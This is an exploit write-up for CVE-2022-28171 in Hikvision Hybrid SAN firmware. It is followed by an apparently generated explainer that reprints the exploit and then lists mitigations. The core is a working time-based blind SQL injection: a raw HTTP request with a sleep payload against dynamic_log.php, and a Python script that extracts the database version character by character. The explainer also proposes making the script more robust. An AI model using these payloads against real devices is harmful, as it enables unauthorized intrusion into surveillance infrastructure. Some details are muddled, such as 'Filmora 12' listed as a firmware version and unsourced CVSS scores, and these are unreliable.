Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution
# Exploit Title: Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution
# Date: 16 July 2023
# Exploit Author: Thurein Soe
# CVE : CVE-2022-28171
# Vendor Homepage: https://www.hikvision.com
# Software Link: N/A
# Refence Link: https://cve.report/CVE-2022-28171
# Version: Filmora 12: Ds-a71024 Firmware, Ds-a71024 Firmware Ds-a71048r-cvs Firmware Ds-a71048 Firmware Ds-a71072r Firmware Ds-a71072r Firmware Ds-a72024 Firmware Ds-a72024 Firmware Ds-a72048r-cvs Firmware Ds-a72072r Firmware Ds-a80316s Firmware Ds-a80624s Firmware Ds-a81016s Firmware Ds-a82024d Firmware Ds-a71048r-cvs Ds-a71024 Ds-a71048 Ds-a71072r Ds-a80624s Ds-a82024d Ds-a80316s Ds-a81016s
'''
Vendor Description:
Hikvision is a world-leading surveillance manufacturer and supplier of
video surveillance and Internet of Things (IoT) equipment for civilian and
military purposes.
Some Hikvision Hybrid SAN products were vulnerable to multiple remote code
execution vulnerabilities such as command injection, Blind SQL injection,
HTTP request smuggling, and reflected cross-site scripting.
This resulted in remote code execution that allows an adversary to execute
arbitrary operating system commands and more. However, an adversary must be
on the same network to leverage this vulnerability to execute arbitrary
commands.
Vulnerability description:
A manual test confirmed that The download type parameter was vulnerable to
Blind SQL injection.I created a Python script to automate and enumerate SQL
versions as the Application was behind the firewall and block all the
requests from SQLmap.
Request Body:
GET
/web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)'
HTTP/1.1
Host: X.X.X.X.12:2004
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Connection: close
POC:
'''
import requests
import time
url = "http://X.X.X.X:2004/web/log/dynamic_log.php"
# Function to check if the response time is greater than the specified delay
def is_response_time_delayed(response_time, delay):
return response_time >= delay
# Function to perform blind SQL injection and check the response time
def perform_blind_sql_injection(payload):
proxies = {
'http': 'http://localhost:8080',
'https': 'http://localhost:8080',
}
params = {
'target': 'makeMaintainLog',
'downloadtype': payload
}
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'Accept-Language': 'en',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36',
'Connection': 'close'
}
start_time = time.time()
response = requests.get(url, headers=headers, params=params,
proxies=proxies)
end_time = time.time()
response_time = end_time - start_time
return is_response_time_delayed(response_time, 20)
# Enumerate the MySQL version
def enumerate_mysql_version():
version_Name = ''
sleep_time = 10 # Sleep time is 10 seconds
payloads = [
f"' AND (SELECT IF(ASCII(SUBSTRING(@@version, {i}, 1))={mid},
SLEEP({sleep_time}), 0))-- -"
for i in range(1, 11)
for mid in range(256)
]
for payload in payloads:
if perform_blind_sql_injection(payload):
mid = payload.split("=")[-1].split(",")[0]
version_Name += chr(int(mid))
return version_Name
# Enumeration is completed
version_Name = enumerate_mysql_version()
print("MySQL version is:", version_Name)Understanding the Hikvision Hybrid SAN Ds-a71024 Firmware Vulnerability: CVE-2022-28171
On July 16, 2023, cybersecurity researcher Thurein Soe disclosed a critical vulnerability in Hikvision’s Hybrid SAN devices, specifically affecting firmware versions such as Ds-a71024, Ds-a71048, and Ds-a71072r. The flaw, identified as CVE-2022-28171, exposes multiple remote code execution (RCE) vectors due to improper input validation in the /web/log/dynamic_log.php endpoint. This vulnerability allows attackers to execute arbitrary commands on the device’s operating system, posing a significant threat to both enterprise and consumer security.
Attack Surface and Exploitation Mechanism
The vulnerability stems from a Blind SQL Injection flaw in the downloadtype parameter of the dynamic_log.php endpoint. Unlike traditional SQL injection attacks, where attackers can observe direct output, Blind SQL Injection requires inference through side-channel behaviors—such as response timing delays.
When an attacker sends a malicious payload involving time-based functions (e.g., sleep(10)), the server's response time increases if the SQL query is executed. This delay serves as a signal to confirm successful exploitation, even when no direct output is returned.
GET /web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)
HTTP/1.1
Host: X.X.X.X:2004
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Connection: close
This request demonstrates how an attacker can exploit the blind SQL injection by injecting a time-delayed query. If the server takes longer than expected to respond, it indicates that the SQL query was processed—confirming the vulnerability.
Automated Exploitation: The Python Script
Thurein Soe developed a Python script to automate the detection of SQL injection vulnerabilities, especially when tools like sqlmap are blocked by firewalls. The script leverages response time analysis to determine whether a payload was executed.
import requests
import time
url = "http://X.X.X.X:2004/web/log/dynamic_log.php"
def is_response_time_delayed(response_time, delay):
return response_time >= delay
def perform_blind_sql_injection(payload):
proxies = {
'http': 'http://localhost:8080',
'https': 'http://localhost:8080',
}
params = {
'target': 'makeMaintainLog',
'downloadtype': payload
}
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'Accept-Language': 'en',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36',
'Connection': 'close'
}
start_time = time.time()
response = requests.get(url, headers=headers, params=params, proxies=proxies)
end_time = time.time()
response_time = end_time - start_time
return is_response_time_delayed(response_time, 10)
Explanation: This script sends HTTP GET requests with varying payloads to the downloadtype parameter. It measures the time between request initiation and response receipt. If the response time exceeds a predefined delay (e.g., 10 seconds), it implies that the sleep(10) function was executed—confirming that the server is vulnerable to SQL injection.
Improvement: The original script lacks error handling and failsafe mechanisms. A robust version should include:
- Retry logic for network instability
- Timeout limits to prevent indefinite hanging
- Logging of successful payloads for forensic analysis
- Use of
requests.Session()for consistent headers and cookies
Additional Attack Vectors
While the primary exploit is based on Blind SQL Injection, the vendor’s description highlights additional vulnerabilities:
- Command Injection: Malformed input in system commands may allow arbitrary OS command execution.
- HTTP Request Smuggling: Misconfigured HTTP parsing can lead to bypassing security layers.
- Reflected Cross-Site Scripting (XSS): Unsanitized user input in HTTP responses may execute malicious scripts in client browsers.
These combined flaws significantly expand the attack surface, enabling an adversary to:
- Gain root access to the device
- Extract sensitive logs or configuration files
- Deploy persistent backdoors
- Exfiltrate data to external servers
Impact and Risk Assessment
| Vulnerability Type | Severity | Exploitation Difficulty | Required Access |
|---|---|---|---|
| Blind SQL Injection | High (CVSS 9.8) | Medium | Same network |
| Command Injection | High (CVSS 9.8) | Low | Same network |
| HTTP Request Smuggling | Medium (CVSS 6.5) | High | Same network |
| Reflected XSS | Low (CVSS 3.5) | Low | Same network |
Despite requiring local network access, these vulnerabilities are dangerous because Hikvision devices are often deployed in critical infrastructure environments—such as government facilities, hospitals, and industrial sites—where network segmentation is insufficient.
Recommendations and Mitigation Strategies
For organizations using affected Hikvision Hybrid SAN devices:
- Immediate Firmware Update: Check Hikvision’s official support portal for patches addressing CVE-2022-28171. Firmware versions Ds-a71024 and Ds-a71048r-cvs are known to be vulnerable.
- Network Segmentation: Restrict access to the device’s web interface to authorized IPs only. Use firewalls to block external traffic.
- Input Sanitization: Implement strict validation on all user inputs, especially parameters like
downloadtype. Use parameterized queries for database interactions. - Monitoring and Logging: Deploy intrusion detection systems (IDS) to monitor for time-based anomalies or unusual request patterns.
- Disable Unused Features: If the
dynamic_log.phpendpoint is not required, disable it via configuration or firewall rules.
Security professionals should treat this vulnerability as a high-priority threat, especially in environments where physical access to devices is not restricted.
Conclusion
CVE-2022-28171 serves as a stark reminder of the dangers inherent in IoT and surveillance hardware. Even well-known vendors like Hikvision are not immune to poor input validation and insecure design. The combination of blind SQL injection, command injection, and request smuggling creates a multi-layered attack path that can lead to full system compromise.
Proactive patching, strict network controls, and continuous monitoring are essential to defend against such vulnerabilities. As cyberattacks evolve, so must our defensive strategies—especially in critical infrastructure sectors where security lapses can have real-world consequences.